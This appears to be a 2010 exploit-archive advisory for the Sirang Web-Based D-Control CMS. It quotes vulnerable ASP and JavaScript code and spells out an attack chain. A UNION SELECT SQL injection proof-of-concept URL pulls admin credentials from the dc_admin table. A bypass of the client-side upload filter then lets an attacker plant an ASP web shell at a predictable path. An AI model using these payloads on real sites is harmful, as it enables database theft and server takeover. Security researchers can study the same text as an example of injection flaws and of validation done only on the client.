Home / os / win7

Sirang Web-Based D-Control Multiple Remote Vulnerabilities

Posted on 08 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Sirang Web-Based D-Control Multiple Remote Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== Sirang Web-Based D-Control Multiple Remote Vulnerabilities ========================================================== - Title : Sirang Web-Based D-Control Multiple Remote Vulnerabilities - Affected Version : &lt;= v6.0 - Vendor Site : http://www.sirang.com - Discovery : Abysssec.com Description : this CMS suffer from OWASP top 10 !!! some of there will come here ... Vulnerabilites : ====================================================================================================================== 1- SQL Injection Vulnerability is located in content.asp line 131-133 ... txt=&quot;select * from news where del='false' and &quot;+keyfld+&quot;!='-' order by id desc limit 1&quot; set rs=conn.execute(txt) while not rs.eof ... content.asp line 202-206 ... if id&lt;&gt;&quot;&quot; then txt10 =&quot;select * from &quot;+ cstr(tblname) +&quot; where del='false' and id='&quot;+ id +&quot;'&quot; set xx = conn.execute(txt10) if not xx.eof then ... lots of files those will have to do input validation from user input are vulnerable to SQL Injection . PoC : www.site.com/main_fa.asp?status=news&amp;newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/* note : if you can't see result you need to do it blindly ====================================================================================================================== 2- Bypass uploads restriction: after you got user/pass with sql injection go to http://site.com/admin/dc_upload.asp js file line 13-34 : function showthumb(file) { if (file !='') { myshowfile = file; extArray = new Array(&quot;.gif&quot;, &quot;.jpg&quot;, &quot;.png&quot;, &quot;.bmp&quot;, &quot;.jpe&quot;); allowSubmit = false; while (file.indexOf(&quot;\&quot;) != -1) file = file.slice(file.indexOf(&quot;\&quot;) + 1); ext = file.slice(file.indexOf(&quot;.&quot;)).toLowerCase(); for (var i = 0; i &lt; extArray.length; i++) { if (extArray[i] == ext) { allowSubmit = true; break; } } if (allowSubmit) thumb.src=myshowfile; else alert(&quot;Only files that end in types: &quot; + (extArray.join(&quot; &quot;)) + &quot; could be previewd.&quot;); } else { alert(&quot;Only files that end in types: &quot; + (extArray.join(&quot; &quot;)) + &quot; could be previewd.&quot;); } } as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload &quot;ASP&quot; shell. you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP